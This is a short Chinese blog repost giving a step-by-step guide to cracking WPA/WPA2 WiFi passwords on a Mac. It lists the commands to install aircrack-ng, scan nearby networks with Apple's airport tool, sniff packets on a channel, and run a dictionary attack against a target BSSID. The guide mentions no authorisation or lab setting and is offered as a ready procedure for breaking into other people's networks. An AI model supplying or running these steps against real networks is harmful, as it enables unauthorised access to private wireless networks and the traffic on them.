aircrack-ng破解WiFi密码

<p>https://blog.csdn.net/jpiverson/article/details/22663101</p>
<p>https://www.cnblogs.com/daoyi/p/shi-yongmacbook-po-jieWPAWPA2-wifi-mi-ma.html</p>

  

1.安装aircrack-ng

使用homebrew安装,命令:brew install aircrack-ng

2.查看周围的wifi:

命令:$/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s

3.查看本机的无线网卡设备:

命令:$ ifconfig

4.抓包
命令:$ sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff 6

5.破解密码

  等terminal运行一会,control + c 

$ sudo aircrack-ng -w password.txt -b c8:3a:35:30:3e:c8 /tmp/*.cap

-w:指定字典文件;-b:指定要破解的wifi BSSID。

猜你喜欢

转载自www.cnblogs.com/tom2015010203/p/9493595.html
今日推荐